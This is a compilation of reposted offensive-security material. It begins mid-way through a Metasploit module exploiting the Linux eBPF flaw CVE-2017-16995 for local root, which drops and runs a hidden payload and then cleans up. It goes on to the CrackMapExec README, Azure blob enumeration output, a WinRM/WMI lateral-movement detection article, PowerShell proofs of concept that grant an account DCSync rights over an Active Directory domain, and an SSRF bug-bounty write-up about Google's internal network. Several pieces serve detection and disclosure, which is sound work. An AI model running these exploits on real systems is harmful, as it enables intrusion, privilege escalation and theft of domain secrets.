          [ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-16995.html' ],
          [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1454' ],
          [ 'URL', 'http://openwall.com/lists/oss-security/2017/12/21/2' ],
          [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=95a762e2c8c942780948091f8f2a4f32fce1ac6f' ]
        ],
      'DefaultTarget'  => 0))
    register_options [
      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ]),
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
  end

  def upload_and_chmodx(path, data)
    upload path, data
    cmd_exec "chmod +x '#{path}'"
  end

  def upload_and_compile(path, data)
    upload "#{path}.c", data

    gcc_cmd = "gcc -o #{path} #{path}.c"
    if session.type.eql? 'shell'
      gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
    end
    output = cmd_exec gcc_cmd

    rm_f "#{path}.c"

    unless output.blank?
      print_error output
      fail_with Failure::Unknown, "#{path}.c failed to compile. Set COMPILE False to upload a pre-compiled executable."
    end

    cmd_exec "chmod +x #{path}"
  end

  def exploit_data(file)
    path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2017-16995', file
    fd = ::File.open path, 'rb'
    data = fd.read fd.stat.size
    fd.close
    data
  end

  def live_compile?
    return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')

    if has_gcc?
      vprint_good 'gcc is installed'
      return true
    end

    unless datastore['COMPILE'].eql? 'Auto'
      fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
    end
  end

  def check
    arch = kernel_hardware
    unless arch.include? 'x86_64'
      vprint_error "System architecture #{arch} is not supported"
      return CheckCode::Safe
    end
    vprint_good "System architecture #{arch} is supported"

    if unprivileged_bpf_disabled?
      vprint_error 'Unprivileged BPF loading is not permitted'
      return CheckCode::Safe
    end
    vprint_good 'Unprivileged BPF loading is permitted'

    release = kernel_release
    if Gem::Version.new(release.split('-').first) > Gem::Version.new('4.14.11') ||
       Gem::Version.new(release.split('-').first) < Gem::Version.new('4.0')
      vprint_error "Kernel version #{release} is not vulnerable"
      return CheckCode::Safe
    end
    vprint_good "Kernel version #{release} appears to be vulnerable"

    CheckCode::Appears
  end

  def exploit
    unless check == CheckCode::Appears
      fail_with Failure::NotVulnerable, 'Target not vulnerable! punt!'
    end

    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    # Upload exploit executable
    executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
    executable_path = "#{base_dir}/#{executable_name}"
    if live_compile?
      vprint_status 'Live compiling exploit on system...'
      upload_and_compile executable_path, exploit_data('exploit.c')
    else
      vprint_status 'Dropping pre-compiled exploit on system...'
      upload_and_chmodx executable_path, exploit_data('exploit.out')
    end

    # Upload payload executable
    payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
    upload_and_chmodx payload_path, generate_payload_exe

    # Launch exploit
    print_status 'Launching exploit ...'
    output = cmd_exec "echo '#{payload_path} & exit' | #{executable_path} "
    output.each_line { |line| vprint_status line.chomp }

    print_status "Cleaning up #{payload_path} and #{executable_path} ..."
    rm_f executable_path
    rm_f payload_path
  end
end

Source: https://www.exploit-db.com/exploits/45058/
  21. CrackMapExec

Acknowledgments (These are the people who did the hard stuff)

This project was originally inspired by:
- smbmap
- CredCrack
- smbexec

Unintentional contributors:
- The Empire project
- @T-S-A's smbspider script
- @ConsciousHacker's partial Python port of Invoke-Obfuscation from the GreatSCT project

This repository contains the following repositories as submodules:
- Impacket
- Pywinrm
- Pywerview
- PowerSploit
- Invoke-Obfuscation
- Invoke-Vnc
- Mimikittenz
- NetRipper
- RandomPS-Scripts
- SessionGopher
- Mimipenguin

Documentation, Tutorials, Examples

See the project's wiki for documentation and usage examples.

Installation

Please see the installation wiki page here.

How to fund my tea & sushi reserve

BTC: 1ER8rRE6NTZ7RHN88zc6JY87LvtyuRUJGU
ETH: 0x91d9aDCf8B91f55BCBF0841616A01BeE551E90ee
LTC: LLMa2bsvXbgBGnnBwiXYazsj7Uz6zRe4fr

To do
- Kerberos support
- 0wn everything

Source: https://github.com/byt3bl33d3r/CrackMapExec
  22. MicroBurst

A collection of scripts for assessing Microsoft Azure security.

Invoke-EnumerateAzureBlobs.ps1

PS C:\> Get-Help Invoke-EnumerateAzureBlobs

NAME: Invoke-EnumerateAzureBlobs

SYNOPSIS: PowerShell function for enumerating public Azure Blobs and Containers.

SYNTAX: Invoke-EnumerateAzureBlobs [[-Base] ] [[-OutputFile] ] [[-Permutations] ] [[-Folders] ] [[-BingAPIKey] ] []

DESCRIPTION: The function will check for valid .blob.core.windows.net host names via DNS. If a BingAPIKey is supplied, a Bing search will be made for the base word under the .blob.core.windows.net site. After completing storage account enumeration, the function then checks for valid containers via the Azure REST API methods. If a valid container has public files, the function will list them out.

-------------------------- EXAMPLE 1 --------------------------

PS C:\> Invoke-EnumerateAzureBlobs -Base secure

Found Storage Account - secure.blob.core.windows.net
Found Storage Account - testsecure.blob.core.windows.net
Found Storage Account - securetest.blob.core.windows.net
Found Storage Account - securedata.blob.core.windows.net
Found Storage Account - securefiles.blob.core.windows.net
Found Storage Account - securefilestorage.blob.core.windows.net
Found Storage Account - securestorageaccount.blob.core.windows.net
Found Storage Account - securesql.blob.core.windows.net
Found Storage Account - hrsecure.blob.core.windows.net
Found Storage Account - secureit.blob.core.windows.net
Found Storage Account - secureimages.blob.core.windows.net
Found Storage Account - securestorage.blob.core.windows.net

Found Container - hrsecure.blob.core.windows.net/NETSPItest
Public File Available: https://hrsecure.blob.core.windows.net/NETSPItest/SuperSecretFile.txt
Found Container - secureimages.blob.core.windows.net/NETSPItest123

RELATED LINKS: https://blog.netspi.com/anonymously-enumerating-azure-file-resources/

Source: https://github.com/NetSPI/MicroBurst
  23. Lateral Movement Using WinRM and WMI

Tony Lambert | November 20, 2017

Many organizations invest millions of dollars to bolster their systems and prevent attackers from gaining entry. Much less attention is given to the concept of lateral movement within an organization. Yet we've seen time and time again that once an adversary breaks through the crunchy outer layer of the network, the gooey center quickly becomes trivial to move about. Stopping lateral movement is just as important as preventing a breach. Attackers frequently move laterally with tools included in Windows, and this tactic has also been observed within commodity malware samples. This article will outline a threat detection in which Windows Remote Management (WinRM) spawned a process via Windows Management Instrumentation (WMI). First, let's take a look at normal execution of WinRM and why it's important to secure it.

How WinRM Usually Works

Normal execution of WinRM involves the configuration and inspection of the Windows Remote Management subsystem. This subsystem has been part of Windows by default since Windows Vista, and it has evolved to power the new way of remote management: PowerShell Remoting. Essentially, Windows has a built-in-by-default system that lends itself well to lateral movement, and it's up to administrators to secure it properly. If admins don't take the right steps, attackers can use stolen credentials to launch processes on multiple computers across the network. Within minutes, an incident can grow from a single compromised system to hundreds using built-in tools in Windows. We usually see simple commands such as "winrm get config" or "winrm quickconfig." In this case, we noticed something very different…

What are we seeing and why isn't it normal?

Functionality of the WinRM command is provided through a Visual Basic script, so it's natural to see WinRM configuration performed from the CScript utility. The command of concern used with WinRM here is the "invoke" command. 
This command allows WinRM to work with management resources defined by the Windows operating system, primarily through WMI. After looking into the structure of a WinRM command, we discovered that whatever comes after "invoke" is a method defined per management resource or WMI class. In this case, the Win32_Process WMI class has a "Create" method. This allows the user of WinRM to execute a process via WMI. Now we can interpret the rest of the command. The screenshot below enumerates three things to note.

The "-r" switch (1) signifies that the WinRM Invoke statement is being executed on a remote host specified at the "HTTPS" address. This is significant because if we look at the host this command was executed from, we won't find evidence of what happened after this command. To get visibility from here, we'd need to jump over to the remote host and observe what happened. The "-a" (2) and "-c" (3) switches signify that the attacker authenticated to the remote host using a certificate identified by the specified thumbprint.

At this point it should be becoming apparent that this isn't normal. There are much better ways to run simple applications when authorized to do so. For example, legitimate system administrators can use PowerShell Remoting or PsExec commands to run applications on remote computers. And when on a local computer, users can simply double-click on applications or launch them through the Command Shell or PowerShell. Quite simply, processes started in this fashion are an anomaly. But, hey… at least the attacker used encryption when connecting to the host!

How to Detect This Threat

A detection engineer originally found this event due to other bad behavior on the endpoint and realized we needed a way to better detect it. To get more information about its detection, we jumped into a test lab to look at different permutations of this attack. We realized the attack would be slightly different if the attacker had left out the remote connectivity options, so we began there. 
In most cases when a command launches another command, we expect to see the second one spawn as a child process of the first. So in theory we would expect WinRM to spawn a process as a child of "CScript.exe." Once we got into the lab, we found a different reality: CScript had no child processes! Not only that, it didn't modify any files or leave any other telltale signs that a process had been spawned. So we needed to dive deeper to find how Notepad executed…

Notepad spawned as a child process of "wmiprvse.exe," a binary whose function allows WMI to interface with the rest of the Windows operating system. Our WinRM command simply submitted an operation to WMI, and WMI used its own interfaces to execute that operation and spawn a process.

Our initial detection specified a remote host, so our next round of testing needed a remote host. This time around, we raised the stakes by attempting to execute "vssadmin.exe" instead of Notepad, since we've observed lateral movement used with vssadmin during ransomware attacks. When we examined the execution of vssadmin, we discovered that it spawned from "wmiprvse.exe" just like in our first test (which did not involve a remote host). This time around there was another catch: we didn't see a network connection from "wmiprvse.exe". In fact, we had to search around to find the connection, and it was shown as established by one of the "svchost" processes. This is due to the nature of WinRM, since it executes as a Windows service and makes all the relevant network connections on behalf of the processes that use it.

To expand your detection functions for this attack, you'll need to monitor processes spawning from "wmiprvse.exe" and suspicious network connections to "svchost." For those interested in monitoring processes spawning from WMI, be warned! It gets noisy, and you'll need to establish a baseline of what looks normal in your environment. Once you can outline legitimate activity from your admins, you can focus on spotting evil. 
How to Mitigate This Threat

WinRM can be secured in a few different ways. First, system admins should establish a management network architecture that lends itself to increased security. This involves establishing a jumpbox that is only used for remote administration functions. This strategy helps secure a network by forcing privileged activity through a single controlled and hardened system, therefore not exposing sensitive credentials to attack. It also helps secure WinRM directly because we can limit the number of hosts trusted by the WinRM subsystem. In an ideal environment, client computers in the organization should not trust one another, and they should only trust the jumpbox systems. To configure what trusted hosts are allowed to contact WinRM, we can execute the following command:

winrm set winrm/config/client '@{TrustedHosts="JumpBox1,JumpBox2"}'

This configuration can also be enforced using Group Policy objects in an Active Directory environment, via a policy with the "Allow remote server management through WinRM" setting that specifies a list of hosts to trust. For authentication to WinRM for management, keep the defaults when possible, as they don't allow the less secure methods of authentication (Kerberos is the default). Finally, WinRM default configurations establish both an HTTP and an HTTPS listener. If you can, endeavor to disable the HTTP listener and only use WinRM over HTTPS. This may involve diving deeper into SSL/TLS certificates in your organization, so approach that with careful planning.

Key Takeaways

Preventing malicious lateral movement is just as important as preventing the initial breach. Limiting this movement helps security teams "stop the bleeding" during an incident and prevent it from becoming a full-scale breach. Detection of this threat is difficult as WMI processes are noisy, but a solid understanding of your network makes it much easier. 
Taking action against this threat is a great way to defend your organization and stop a breach in its tracks!

Source: https://redcanary.com/blog/lateral-movement-winrm-wmi/
  24. Exchange-AD-Privesc

This repository provides a few techniques and scripts regarding the impact of Microsoft Exchange deployment on Active Directory security. This is a side project of AD-Control-Paths, an AD permissions auditing project to which I recently added some Exchange-related modules.

General considerations

For pentesters looking to take control of an AD domain, Exchange is a valid intermediary target. The servers are much less secured than domain controllers by default, and the control groups are distinct in the usual permissions models, which provides numerous alternative targets. They are also more difficult to migrate and business critical, so organizations often adopt a slower migration process for Exchange than for AD and do not specifically harden the servers. Exchange deployment on an Active Directory domain is an interesting case. Many attributes and classes are added to the schema, security groups are created, and DACLs on some AD objects are heavily modified. Basically, you can select among 3 permissions models:

- RBAC Split (recommended and most commonly deployed)
- Shared permissions (default)
- AD Split

Particularly, DACLs for the RBAC Split and Shared models are enumerated here: https://technet.microsoft.com/en-us/library/ee681663(v=exchg.150).aspx

High value targets:

- Exchange Trusted Subsystem and Exchange Windows Permissions groups, which are trustees for many ACEs added during deployment on AD objects.
- Exchange servers: they are members of the Exchange Trusted Subsystem and Exchange Windows Permissions groups. They can be compromised using many more techniques than domain controllers: local administrators domain accounts, Kerberos delegation, SMB relay, RODC replication, etc. The usual stuff.
- Organization admins: they are part of the local administrators group on Exchange servers. They also have full control of the OU containing the Exchange security groups. They can launch service/psexec/runas/... 
under computer identity/NetworkService/LocalSystem to control the Exchange Trusted Subsystem and Exchange Windows Permissions SIDs.

1. Domain object DACL privilege escalation

A privilege escalation is possible from the Exchange Windows Permissions (EWP) security group to compromise the entire prepared Active Directory domain.

DISCLAIMER: This issue was responsibly disclosed to MSRC in October 2017 and, after a few back and forth emails, they decided it was working as intended and would not fix it.

Description of the issue

When preparing an Exchange 2010/2013/2016 installation in Shared permissions (default) or RBAC split permissions, some ACEs are positioned on the domain object for the Exchange Windows Permissions security group. This happens during the "Setup /PrepareDomain" command. Two ACEs on the domain object are missing the INHERIT_ONLY_ACE bit in the Flags field. This is their SDDL representation:

(OA;CI;DTWD;;4828cc14-1437-45bc-9b07-ad6f015e5f28;<SID of EWP>)
(OA;CI;DTWD;;bf967aba-0de6-11d0-a285-00aa003049e2;<SID of EWP>)

Notice the missing 'IO' (inherit_only) flag. As a matter of fact, INHERITED_OBJECT_TYPE ACEs effectively apply to the object itself when the inherit_only flag is not set. This is how they are documented on Technet, so the documentation is definitely missing that information:

Account                      | ACE type  | Inheritance | Permissions | On property / Applies to | Comments
-----------------------------|-----------|-------------|-------------|--------------------------|---------
Exchange Windows Permissions | Allow ACE | All         | WriteDACL   | / user                   |
Exchange Windows Permissions | Allow ACE | All         | WriteDACL   | / inetOrgPerson          |

This is how they appear in the GUI (DSA console), which is also missing that information. The issue can be confirmed in the "Effective Access" tab of the domain object when specifying EWP. Coincidentally, INHERITED_OBJECT_TYPE ACEs created with the DSA console always have the IO flag. Creating a 'self and specific descendents' INHERITED_OBJECT_TYPE ACE is only possible programmatically, and it is only viewable programmatically. 
Technical consequence

The Allow permission to WriteDACL is granted to the Trustee on the domain object itself and not only on its user/inetOrgPerson descendants, effectively giving complete control to anyone with the Exchange Windows Permissions SID in their token.

Expected behavior

The Allow permission to WriteDACL should only be given on child objects matching the INHERITED_OBJECT_TYPE GUID. It is supposed to only apply to the user or inetOrgPerson classes. This is not consistent with the other INHERITED_OBJECT_TYPE ACEs on the domain object for the same Trustee, which all have the INHERIT_ONLY_ACE bit in the Flags field.

Security Consequence

A privilege escalation is possible from the Exchange Windows Permissions (EWP) security group to compromise the entire prepared Active Directory domain. Just set the Ds-Replication-Get-Changes-All extended right on the domain object. This is enough to use a DRSUAPI replication tool a la DCSync to get all the domain secrets (Kerberos keys, hashes, etc.). You can control the SID of the EWP group from Organization Management, from Account Operators or from any Exchange server. Interestingly, the RBAC system is proxified through EWP, so a privilege escalation is also possible from the Active Directory Permissions RBAC role to compromise the entire prepared Active Directory domain.

Proof of concept 1: Set-Acl (or with DSA console)

From an Organization Management member account, add yourself to Exchange Windows Permissions. This is possible by default (see the above Technet page).

$id = [Security.Principal.WindowsIdentity]::GetCurrent()
$user = Get-ADUser -Identity $id.User
Add-ADGroupMember -Identity "Exchange Windows Permissions" -Members $user

RELOG to update the groups in your token, then give yourself the Ds-Replication-Get-Changes-All extended right on the domain object. 
$acl = Get-Acl "AD:DC=test,DC=local"
$id = [Security.Principal.WindowsIdentity]::GetCurrent()
$user = Get-ADUser -Identity $id.User
$sid = New-Object System.Security.Principal.SecurityIdentifier $user.SID
# rightsGuid for the extended right Ds-Replication-Get-Changes-All
$objectGuid = New-Object Guid 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
$identity = [System.Security.Principal.IdentityReference] $sid
$adRights = [System.DirectoryServices.ActiveDirectoryRights] "ExtendedRight"
$type = [System.Security.AccessControl.AccessControlType] "Allow"
$inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "None"
$ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $identity,$adRights,$type,$objectGuid,$inheritanceType
$acl.AddAccessRule($ace)
Set-Acl -AclObject $acl "AD:DC=test,DC=local"

Proof of concept 2: RBAC Add-ADPermission

The following PowerShell code, executed by a user account holding the RBAC role Active Directory Permissions, sets the Ds-Replication-Get-Changes-All extended right on the domain object.

$id = [Security.Principal.WindowsIdentity]::GetCurrent()
Add-ADPermission "DC=test,DC=local" -User $id.Name -ExtendedRights Ds-Replication-Get-Changes-All

Workaround fix

Use the Fix-DomainObjectDACL.ps1 PowerShell script in this repository. Read it, test it, and use it at your own risk. By default it checks the two faulty ACEs; this can be done by any user. Use the -Fix switch with Domain Admins privileges to set the missing inherit_only flags.

Another option is doing it manually with LDP. Bind as a Domain Admin account with the usual precautions, as you will change the domain object DACL. Locate the two faulty ACEs in the DACL of the domain object: you can sort by Trustee to find Exchange Windows Permissions; there will only be two ACEs with "Write DACL,..." rights. Check the 'Inherit only' box in their ACE Flags field.

Sursa: https://github.com/gdedrouas/Exchange-AD-Privesc
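At the SDDL level, the repair amounts to appending IO to the flags field of the two faulty WriteDACL ACEs (identified by their inherited-object-type GUIDs for user and inetOrgPerson). The sketch below is a Python illustration of that flag change on ACE strings, not the actual logic of Fix-DomainObjectDACL.ps1, which works through the AD PowerShell cmdlets:

```python
# Illustrative sketch only: add the missing IO (INHERIT_ONLY) flag to the
# two faulty EWP WriteDACL ACEs, matching them by the schemaIDGUIDs of the
# user and inetOrgPerson classes in the inherited-object-type field.

FAULTY_GUIDS = (
    "4828cc14-1437-45bc-9b07-ad6f015e5f28",  # inetOrgPerson class
    "bf967aba-0de6-11d0-a285-00aa003049e2",  # user class
)

def fix_ace(ace):
    """Append IO to the flags of a faulty WriteDACL (WD) ACE; leave others untouched."""
    fields = ace.strip("()").split(";")
    ace_type, flags, rights, object_guid, inherited_guid, trustee = fields
    if inherited_guid in FAULTY_GUIDS and "WD" in rights and "IO" not in flags:
        flags += "IO"
    return "(" + ";".join([ace_type, flags, rights, object_guid, inherited_guid, trustee]) + ")"

faulty = "(OA;CI;DTWD;;bf967aba-0de6-11d0-a285-00aa003049e2;<SID of EWP>)"
print(fix_ace(faulty))  # -> (OA;CIIO;DTWD;;bf967aba-0de6-11d0-a285-00aa003049e2;<SID of EWP>)
```

With CI plus IO set, the ACE no longer applies to the domain object itself, only to matching descendants, which is the behavior the manual LDP fix achieves by checking the 'Inherit only' box.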
25. Into the Borg – SSRF inside Google production network

July 20, 2018 | 5 Comments

Intro – Testing Google Sites and Google Caja

In March 2018, I reported an XSS in Google Caja, a tool to securely embed arbitrary HTML/JavaScript in a webpage. In May 2018, after the XSS was fixed, I realised that Google Sites was using an unpatched version of Google Caja, so I checked whether it was vulnerable to the XSS. However, the XSS wasn't exploitable there.

Google Caja parses HTML/JavaScript and modifies it to remove any security-sensitive content, such as iframe or object tags and sensitive JavaScript properties such as document.cookie. Caja mostly parses and sanitizes HTML tags on the client side. However, for remote JavaScript tags (<script src="xxx">), the remote resource was fetched, parsed and sanitized on the server side.

I tried to host a JavaScript file on my server (https://[attacker].com/script.js) and check whether the Google Sites server would fall for the XSS when parsing it server-side, but the server replied that https://[attacker].com/script.js was not accessible. After a few tests, I realised that the Google Sites Caja server would only fetch Google-owned resources like https://www.google.com or https://www.gstatic.com, but not any external resource like https://www.facebook.com. That's strange behavior, because this functionality is meant to fetch external resources, so it looks like a broken feature. More interestingly, it is hard to determine whether an arbitrary URL belongs to Google or not, given the breadth of Google services. Unless…

Finding an SSRF in Google

Whenever I find an endpoint that fetches arbitrary content server-side, I always test for SSRF. I had done it a hundred times on Google services but never had any luck. Anyway, the only explanation for the weird behavior of the Google Caja server was that the fetching was happening on the internal Google network, which is why it could only fetch Google-owned resources but not external resources.
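To see why "does this URL belong to Google?" is such a slippery question, consider a purely hypothetical domain-suffix allowlist (none of these names or suffixes come from Google's actual code); it inevitably misses Google-hosted domains like appspot.com, which is exactly what the next step exploits:

```python
# Hypothetical sketch: a naive suffix-based "is this Google-owned?" check.
# The suffix list is an assumption for illustration, not Google's real logic.
from urllib.parse import urlparse

GOOGLE_SUFFIXES = (".google.com", ".gstatic.com", ".googleapis.com")

def looks_google_owned(url):
    host = urlparse(url).hostname or ""
    # match either the bare domain or any subdomain of it
    return any(host == s.lstrip(".") or host.endswith(s) for s in GOOGLE_SUFFIXES)

print(looks_google_owned("https://www.google.com/script.js"))    # True
print(looks_google_owned("https://www.facebook.com/script.js"))  # False
print(looks_google_owned("https://myapp.appspot.com/script.js")) # False, yet Google-hosted
```

The last case is the interesting one: a suffix list can never enumerate everything Google hosts, whereas "reachable from inside the Google network" captures it all, including attacker-controlled App Engine instances.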
I already knew this was a bug; now the question was whether it was a security bug!

It's very easy to host and run arbitrary code on Google servers: use Google Cloud services! I created a Google App Engine instance and hosted a JavaScript file on it. I then used the URL of this JavaScript file on Google Sites as an external script resource and updated the Google Sites page. The JavaScript was successfully fetched and parsed by the Google Caja server. I then checked my Google App Engine instance logs to see where the resource had been fetched from, and it came from 10.x.x.201, a private network IP! This looked very promising.

I used the private IP as the URL for the Google Sites JavaScript external resource and waited for the moment of truth. The request took more than 30 seconds to complete, and at that point I really thought the request had been blocked; I almost closed the page, since I had never had any luck with SSRF on Google before. However, when Google Caja replied, I saw that the reply size wasn't around 1 KB like a typical error message, but 1 MB instead! One million bytes of information coming from a 10.x.x.x IP on Google's internal network; I can tell you I was excited at this point! :)

I opened the file and indeed it was full of private information from Google! \o/

Google, from the inside

First I want to say that I didn't scan Google's internal network. I only made 3 requests in the network to confirm the vulnerability and immediately sent a report to Google VRP. It took Google 48 hours to fix the issue (I reported it on a Saturday), so in the meantime I couldn't help but try 2-3 more requests to pivot the SSRF vulnerability into unrestricted file access or RCE, but without luck.

The first request was to http://10.x.x.201/. It responded with a server status monitoring page of a "Borglet". After a Google search, I could confirm that I was indeed inside Borg, Google's internal large-scale cluster management system (here is an overview of the architecture).
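Spotting the 10.x.x.x source address in the App Engine logs is what turned a broken feature into an SSRF finding: 10.0.0.0/8 is one of the RFC 1918 private ranges, so a response from it can only come from inside the network. A small Python sketch (the concrete address is redacted in the post, so a made-up 10.0.0.201 stands in for it):

```python
# Check whether an address falls inside one of the three RFC 1918 private
# ranges, as the (redacted) 10.x.x.201 source IP did. 10.0.0.201 is a
# made-up stand-in for the redacted address.
import ipaddress

PRIVATE_NETS = [ipaddress.ip_network(n)
                for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def is_rfc1918(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in PRIVATE_NETS)

print(is_rfc1918("10.0.0.201"))     # True: inside 10.0.0.0/8
print(is_rfc1918("172.217.16.78"))  # False: a public address
```

Requests answered from such an address are, by definition, being made from within the target's internal network, which is why the 1 MB reply mattered so much.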
Google open-sourced Kubernetes, the successor of Borg, in 2014. It seems that while Kubernetes is getting more and more popular, Google still relies on Borg for its internal production infrastructure, but I can tell you it's not because of the design of Borg's interfaces! (edit: this is intended as a joke :) )

The second request was to http://10.x.x.1/, which was also a monitoring page for another Borglet. The third request was to http://10.x.x.1/getstatus, a different status monitoring page of a Borglet with more details on the jobs, like permissions and arguments.

Each Borglet represents a machine, a server. On the hardware side, both servers were using Haswell CPUs @ 2.30GHz with 72 cores, which corresponds to a set of 2 or 3 Xeon E5 v3 chips. Both servers were running their CPUs at 77%. They each had 250GB of RAM, used at 70%. They each had 1 HDD of 2TB and no SSD. The HDDs were almost empty with only 15GB used, so the data is stored elsewhere.

The processing jobs (allocs and tasks) are very diverse; I believe this optimizes resource usage, with some jobs using memory, others using CPU or network, some with high priority, etc. Some services seem very active: video encoding, Gmail and Ads. That should not be surprising, since video processing is very heavy, Gmail is one of the main Google services, and Ads is, well, Google's core business. :)

I didn't see Google Sites or Caja in the jobs list, so either the SSRF was going through a proxy, or the Borglet on 10.x.x.201 was on a different network than the 10.x.x.201 IP I saw in my Google App Engine instance logs.

Regarding the architecture, we can find jobs related to almost all of the components of the Google stack, in particular MapReduce, Bigtable, Flume, GFS… On the technology side, Java seems to be heavily used. I didn't see any mention of Python, C++, NodeJS or Go, but that doesn't mean they weren't used, so don't draw conclusions. :) I should mention that Borg, like Kubernetes, relies on containers (like Docker) and on VMs.
For video processing, it seems they are using gVisor, a Google open-source tool that looks like a trade-off between container performance and VM security.

Parameters give some information on how to reach the applications through network ports. On Borg, it seems that all applications on a server share the same IP address, and each gets some dedicated ports.

App arguments were the most fun part for me, because arguments are almost code. I didn't find Google Search's secret algorithm, but there were some cool queries like this:

MSCR(M(Customer.AdGroupCriterion+Customer.AdGroupCriterion-marshal+FilterDurianAdGroupCriterion+FilterNeedReviewAdGroupCriterion+GroupAdGroupCriterionByAdGroupKey+JoinAdGroupData/MakeUnionTable:3)+M(JoinAdGroupData/MakeUnionTable:2)+M(Customer.AdGroup+Customer.AdGroup-marshal+FilterDurianAdGroup+ParDo(AdGroupDataStripFieldsFn)+JoinAdGroupData/MakeUnionTable)+R(JoinAdGroupData/GroupUnionTables+JoinAdGroupData/ConstructJoinResults+JoinAdGroupData/ExtractTuples+ExtractCreativeAndKeywordReviewables))

If you wonder what Gmail's system user is, it's gmail@prod.google.com. There is also a user "legal-discovery@prod.google.com" that has the permission "auth.impersonation.impersonateNormalUser" on "mdb:all-person-users". (edit: for clarification, I just saw these strings close to each other in a big array and assumed that's what it meant)

There was also a little bit of history, which showed that most jobs were aborted before finishing.

Finally, there were a lot of URLs to other servers and application endpoints. In particular, I tried to access a promising-looking http://wiki/ URL, but it didn't work. I tested a /getFile?FileName=/sys/borglet/borglet.INFO URL but got an unauthorized response. I also tried changing the FileName parameter but got error messages.

Google VRP response

I reported the issue on Saturday May 12, 2018, and it was automatically triaged as a P3 (medium priority) issue.
On Sunday I sent an email to Google Security saying they might want someone to have a look at this. On Monday morning the issue was escalated to P0 (critical), then later decreased to P1. On Monday night the vulnerable endpoint was removed and the issue fixed.

It's not easy to determine the impact of an SSRF, because it really depends on what's in the internal network. Google tends to keep most of its infrastructure available internally and uses a lot of web endpoints, which means that in case of an SSRF, an attacker could potentially access hundreds if not thousands of internal web applications. On the other hand, Google heavily relies on authentication to access resources, which limits the impact of an SSRF. In this case, the Borglet status monitoring page wasn't authenticated, and it leaked a lot of information about the infrastructure. My understanding is that in Kubernetes, this page is authenticated.

Google VRP rewarded me with $13,337, which corresponds to something like unrestricted file access! They explained that while most internal resources would require authentication, they have seen in the past dev or debug handlers giving access to more than just info leaks, so they decided to reward for the maximum potential impact. I'd like to thank them for the bounty and for their quick response. I hope they won't beat me with a stick for disclosing any of this. :)

That's it for this story; I hope you enjoyed it as much as I did, and feel free to comment!

Sursa: https://opnsec.com/2018/07/into-the-borg-ssrf-inside-google-production-network/